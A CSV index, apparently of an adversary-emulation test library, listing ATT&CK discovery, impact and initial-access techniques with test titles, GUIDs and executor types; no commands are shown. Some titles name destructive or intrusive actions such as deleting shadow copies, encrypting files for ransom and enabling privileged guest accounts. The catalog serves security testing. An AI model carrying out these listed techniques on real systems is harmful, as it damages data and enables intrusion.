discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
discovery,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
discovery,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
discovery,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
discovery,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
discovery,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
discovery,T1040,Network Sniffing,9,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
discovery,T1040,Network Sniffing,10,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
discovery,T1040,Network Sniffing,11,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
discovery,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo",b1cbdf8b-6078-48f5-a890-11ea19d7f8e9,bash
discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
discovery,T1135,Network Share Discovery,7,PowerView ShareFinder,d07e4cc1-98ae-447e-9d31-36cb430d28c4,powershell
discovery,T1135,Network Share Discovery,8,WinPwn - shareenumeration,987901d1-5b87-4558-a6d9-cffcabc638b8,powershell
discovery,T1135,Network Share Discovery,9,Network Share Discovery via dir command,13daa2cf-195a-43df-a8bd-7dd5ffb607b5,command_prompt
discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
discovery,T1120,Peripheral Device Discovery,2,WinPwn - printercheck,cb6e76ca-861e-4a7f-be08-564caa3e6f75,powershell
discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad7ad-2286-4c02-ae92-274418c85fec,bash
discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules,8057d484-0fae-49a4-8302-4812c4f1e64e,bash
discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows),85cfbf23-4a1e-4342-8792-007e004b975f,command_prompt
discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery,224b4daf-db44-404e-b6b2-f4d1f0126ef8,command_prompt
discovery,T1082,System Information Discovery,9,Griffon Recon,69bd4abe-8759-49a6-8d21-0f15822d6370,powershell
discovery,T1082,System Information Discovery,10,Environment variables discovery on windows,f400d1c0-1804-4ff8-b069-ef5ddd2adbf3,command_prompt
discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
discovery,T1082,System Information Discovery,12,Show System Integrity Protection status (MacOS),327cc050-9e99-4c8e-99b5-1d15f2fb6b96,sh
discovery,T1082,System Information Discovery,13,WinPwn - winPEAS,eea1d918-825e-47dd-acc2-814d6c58c0e1,powershell
discovery,T1082,System Information Discovery,14,WinPwn - itm4nprivesc,3d256a2f-5e57-4003-8eb6-64d91b1da7ce,powershell
discovery,T1082,System Information Discovery,15,WinPwn - Powersploits privesc checks,345cb8e4-d2de-4011-a580-619cf5a9e2d7,powershell
discovery,T1082,System Information Discovery,16,WinPwn - General privesc checks,5b6f39a2-6ec7-4783-a5fd-2c54a55409ed,powershell
discovery,T1082,System Information Discovery,17,WinPwn - GeneralRecon,7804659b-fdbf-4cf6-b06a-c03e758590e8,powershell
discovery,T1082,System Information Discovery,18,WinPwn - Morerecon,3278b2f6-f733-4875-9ef4-bfed34244f0a,powershell
discovery,T1082,System Information Discovery,19,WinPwn - RBCD-Check,dec6a0d8-bcaf-4c22-9d48-2aee59fb692b,powershell
discovery,T1082,System Information Discovery,20,WinPwn - PowerSharpPack - Watson searching for missing windows patches,07b18a66-6304-47d2-bad0-ef421eb2e107,powershell
discovery,T1082,System Information Discovery,21,WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors,efb79454-1101-4224-a4d0-30c9c8b29ffc,powershell
discovery,T1082,System Information Discovery,22,WinPwn - PowerSharpPack - Seatbelt,5c16ceb4-ba3a-43d7-b848-a13c1f216d95,powershell
discovery,T1082,System Information Discovery,23,Azure Security Scan with SkyArk,26a18d3d-f8bc-486b-9a33-d6df5d78a594,powershell
discovery,T1082,System Information Discovery,24,Linux List Kernel Modules,034fe21c-3186-49dd-8d5d-128b35f181c7,sh
discovery,T1082,System Information Discovery,25,System Information Discovery with WMIC,8851b73a-3624-4bf7-8704-aa312411565c,command_prompt
discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
discovery,T1580,Cloud Infrastructure Discovery,1,AWS - EC2 Enumeration from Cloud Instance,99ee161b-dcb1-4276-8ecb-7cfdcb207820,sh
discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
discovery,T1217,Browser Bookmark Discovery,2,List Mozilla Firefox Bookmark Database Files on macOS,1ca1f9c7-44bc-46bb-8c85-c50e2e94267b,sh
discovery,T1217,Browser Bookmark Discovery,3,List Google Chrome Bookmark JSON Files on macOS,b789d341-154b-4a42-a071-9111588be9bc,sh
discovery,T1217,Browser Bookmark Discovery,4,List Google Chrome / Opera Bookmarks on Windows with powershell,faab755e-4299-48ec-8202-fc7885eb6545,powershell
discovery,T1217,Browser Bookmark Discovery,5,List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt,76f71e2f-480e-4bed-b61e-398fe17499d5,command_prompt
discovery,T1217,Browser Bookmark Discovery,6,List Mozilla Firefox bookmarks on Windows with command prompt,4312cdbc-79fc-4a9c-becc-53d49c734bc5,command_prompt
discovery,T1217,Browser Bookmark Discovery,7,List Internet Explorer Bookmarks using the command prompt,727dbcdb-e495-4ab1-a6c4-80c7f77aef85,command_prompt
discovery,T1217,Browser Bookmark Discovery,8,List Safari Bookmarks on MacOS,5fc528dd-79de-47f5-8188-25572b7fafe0,sh
discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows,970ab6a1-0157-4f3f-9a73-ec4166754b23,command_prompt
discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall Rules,038263cb-00f4-4b0a-98ae-0696c67e1752,command_prompt
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style),dafaf052-5508-402d-bf77-51e0700c02e2,command_prompt
discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports,4b467538-f102-491d-ace7-ed487b853bf5,powershell
discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Active Directory Subnet Objects,9bb45dd7-c466-4f93-83a1-be30e56033ee,command_prompt
discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt
discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
discovery,T1016,System Network Configuration Discovery,9,DNS Server Discovery Using nslookup,34557863-344a-468f-808b-a1bfb89b4fa9,command_prompt
discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
discovery,T1482,Domain Trust Discovery,4,Adfind - Enumerate Active Directory OUs,d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec,command_prompt
discovery,T1482,Domain Trust Discovery,5,Adfind - Enumerate Active Directory Trusts,15fe436d-e771-4ff3-b655-2dca9ba52834,command_prompt
discovery,T1482,Domain Trust Discovery,6,Get-DomainTrust with PowerView,f974894c-5991-4b19-aaf5-7cc2fe298c5d,powershell
discovery,T1482,Domain Trust Discovery,7,Get-ForestTrust with PowerView,58ed10e8-0738-4651-8408-3a3e9a526279,powershell
discovery,T1482,Domain Trust Discovery,8,TruffleSnout - Listing AD Infrastructure,ea1b4f2d-5b82-4006-b64f-f2845608a3bf,command_prompt
discovery,T1083,File and Directory Discovery,1,File and Directory Discovery (cmd.exe),0e36303b-6762-4500-b003-127743b80ba6,command_prompt
discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (PowerShell),2158908e-b7ef-4c21-8a83-3ce4dd05a924,powershell
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
discovery,T1083,File and Directory Discovery,6,Launch DirLister Executable,c5bec457-43c9-4a18-9a24-fe151d8971b7,powershell
discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
discovery,T1057,Process Discovery,5,Process Discovery - wmic process,640cbf6d-659b-498b-ba53-f6dd1a1cc02c,command_prompt
discovery,T1057,Process Discovery,6,Discover Specific Process - tasklist,11ba69ee-902e-4a0f-b3b6-418aed7d7ddb,command_prompt
discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1069.001,Permission Groups Discovery: Local Groups,2,Basic Permission Groups Discovery Windows (Local),1f454dd6-e134-44df-bebb-67de70fb6cd8,command_prompt
discovery,T1069.001,Permission Groups Discovery: Local Groups,3,Permission Groups Discovery PowerShell (Local),a580462d-2c19-4bc7-8b9a-57a41b7d3ba4,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,4,SharpHound3 - LocalAdmin,e03ada14-0980-4107-aff1-7783b2b59bb1,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,5,Wmic Group Discovery,7413be50-be8e-430f-ad4d-07bf197884b2,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,6,WMIObject Group Discovery,69119e58-96db-4110-ad27-954e48f3bb13,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,7,Permission Groups Discovery for Containers- Local Groups,007d7aa4-8c4d-4f55-ba6a-7c965d51219c,sh
discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
discovery,T1201,Password Policy Discovery,3,Examine password complexity policy - CentOS/RHEL 6.x,6ce12552-0adb-4f56-89ff-95ce268f6358,bash
discovery,T1201,Password Policy Discovery,4,Examine password expiration policy - All Linux,7c86c55c-70fa-4a05-83c9-3aa19b145d1a,bash
discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash
discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
discovery,T1201,Password Policy Discovery,10,Use of SecEdit.exe to export the local security policy (including the password policy),510cc97f-56ac-4cd3-a198-d3218c23d889,command_prompt
discovery,T1201,Password Policy Discovery,11,Examine AWS Password Policy,15330820-d405-450b-bd08-16b5be5be9f4,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,1,Discover System Language by Registry Query,631d4cf1-42c9-4209-8fe9-6bd4de9421be,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,2,Discover System Language with chcp,d91473ca-944e-477a-b484-0e80217cd789,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,3,Discover System Language with locale,837d609b-845e-4519-90ce-edc3b4b0e138,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,4,Discover System Language with localectl,07ce871a-b3c3-44a3-97fa-a20118fdc7c9,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,5,Discover System Language by locale file,5d7057c9-2c8a-4026-91dd-13b5584daa69,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,6,Discover System Language by Environment Variable Query,cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a,sh
discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
discovery,T1012,Query Registry,2,Query Registry with Powershell cmdlets,0434d081-bb32-42ce-bcbb-3548e4f2628f,powershell
discovery,T1012,Query Registry,3,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
discovery,T1518.001,Software Discovery: Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
discovery,T1518.001,Software Discovery: Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
discovery,T1518.001,Software Discovery: Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
discovery,T1518.001,Software Discovery: Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh
discovery,T1518.001,Software Discovery: Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
discovery,T1518.001,Software Discovery: Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
discovery,T1526,Cloud Service Discovery,1,Azure - Dump Subscription Data with MicroBurst,1e40bb1d-195e-401e-a86b-c192f55e005c,powershell
discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt
discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt
discovery,T1018,Remote System Discovery,3,Remote System Discovery - nltest,52ab5108-3f6f-42fb-8ba3-73bc054f22c8,command_prompt
discovery,T1018,Remote System Discovery,4,Remote System Discovery - ping sweep,6db1f57f-d1d5-4223-8a66-55c9c65a9592,command_prompt
discovery,T1018,Remote System Discovery,5,Remote System Discovery - arp,2d5a61f5-0447-4be4-944a-1f8530ed6574,command_prompt
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1018,Remote System Discovery,8,Remote System Discovery - nslookup,baa01aaa-5e13-45ec-8a0d-e46c93c9760f,powershell
discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,95e19466-469e-4316-86d2-1dc401b5a959,command_prompt
discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt
discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt
discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
discovery,T1018,Remote System Discovery,19,Get-WmiObject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
discovery,T1018,Remote System Discovery,20,Remote System Discovery - net group Domain Controller,5843529a-5056-4bc1-9c13-a311e2af4ca0,command_prompt
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1046,Network Service Discovery,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Discovery,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
discovery,T1046,Network Service Discovery,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
discovery,T1046,Network Service Discovery,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
discovery,T1046,Network Service Discovery,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
discovery,T1046,Network Service Discovery,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
discovery,T1046,Network Service Discovery,9,Network Service Discovery for Containers,06eaafdb-8982-426e-8a31-d572da633caa,sh
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
discovery,T1518,Software Discovery,5,WinPwn - DotNet,10ba02d0-ab76-4f80-940d-451633f24c5b,powershell
discovery,T1518,Software Discovery,6,WinPwn - powerSQL,0bb64470-582a-4155-bde2-d6003a95ed34,powershell
discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt
discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d5711d6-655c-4a47-ae9c-6503c74fa877,powershell
discovery,T1124,System Time Discovery,3,System Time Discovery in macOS,f449c933-0891-407f-821e-7916a21a1a6f,sh
discovery,T1124,System Time Discovery,4,System Time Discovery W32tm as a Delay,d5d5a6b0-0f92-42d8-985d-47aafa2dd4db,command_prompt
discovery,T1124,System Time Discovery,5,System Time with Windows time Command,53ead5db-7098-4111-bb3f-563be390e72e,command_prompt
reconnaissance,T1592.001,Gather Victim Host Information: Hardware,1,Enumerate PlugNPlay Camera,d430bf85-b656-40e7-b238-42db01df0183,powershell
impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
impact,T1489,Service Stop,3,Windows - Stop service by killing process,f3191b84-c38b-400b-867e-3a217a27795f,command_prompt
impact,T1491.001,Defacement: Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
impact,T1491.001,Defacement: Internal Defacement,2,Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message,ffcbfaab-c9ff-470b-928c-f086b326089b,powershell
impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f83c-4ec5-8a08-1a56263a5bb2,command_prompt
impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
impact,T1531,Account Access Removal,4,Change User Password via passwd,3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6,sh
impact,T1531,Account Access Removal,5,Delete User via dscl utility,4d938c43-2fe8-4d70-a5b3-5bf239aa7846,sh
impact,T1531,Account Access Removal,6,Delete User via sysadminctl utility,d3812c4e-30ee-466a-a0aa-07e355b561d6,sh
impact,T1531,Account Access Removal,7,Azure AD - Delete user via Azure AD PowerShell,4f577511-dc1c-4045-bcb8-75d2457f01f4,powershell
impact,T1531,Account Access Removal,8,Azure AD - Delete user via Azure CLI,c955c1c7-3145-4a22-af2d-63eea0d967f0,powershell
impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (Linux),7b8ce084-3922-4618-8d22-95f996173765,bash
impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (Linux),53e6735a-4727-44cc-b35b-237682a151ad,bash
impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,bash
impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (Linux),142752dc-ca71-443b-9359-cf6f497315f1,bash
impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
impact,T1486,Data Encrypted for Impact,6,Encrypt files using 7z utility - macOS,645f0f5a-ef09-48d8-b9bc-f0e24c642d72,sh
impact,T1486,Data Encrypted for Impact,7,Encrypt files using openssl utility - macOS,1a01f6b8-b1e8-418e-bbe3-78a6f822759e,sh
impact,T1486,Data Encrypted for Impact,8,Data Encrypted with GPG4Win,4541e2c2-33c8-44b1-be79-9161440f1718,powershell
impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
impact,T1490,Inhibit System Recovery,4,Windows - Disable Windows Recovery Console Repair,cf21060a-80b3-4238-a595-22525de4ab81,command_prompt
impact,T1490,Inhibit System Recovery,5,Windows - Delete Volume Shadow Copies via WMI with PowerShell,39a295ca-7059-4a88-86f6-09556c1211e7,powershell
impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc8a-4ea6-891f-6058569653bf,command_prompt
impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt
impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt
impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,bash
impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,bash
impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,bash
impact,T1529,System Shutdown/Reboot,6,Shutdown System via `halt` - Linux,918f70ab-e1ef-49ff-bc57-b27021df84dd,bash
impact,T1529,System Shutdown/Reboot,7,Reboot System via `halt` - Linux,78f92e14-f1e9-4446-b3e9-f1b921f2459e,bash
impact,T1529,System Shutdown/Reboot,8,Shutdown System via `poweroff` - Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,bash
impact,T1529,System Shutdown/Reboot,9,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
impact,T1529,System Shutdown/Reboot,10,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
initial-access,T1566.001,Phishing: Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
initial-access,T1566.001,Phishing: Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
initial-access,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Source Supply Chain,82a9f001-94c5-495e-9ed5-f530dbded5e2,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
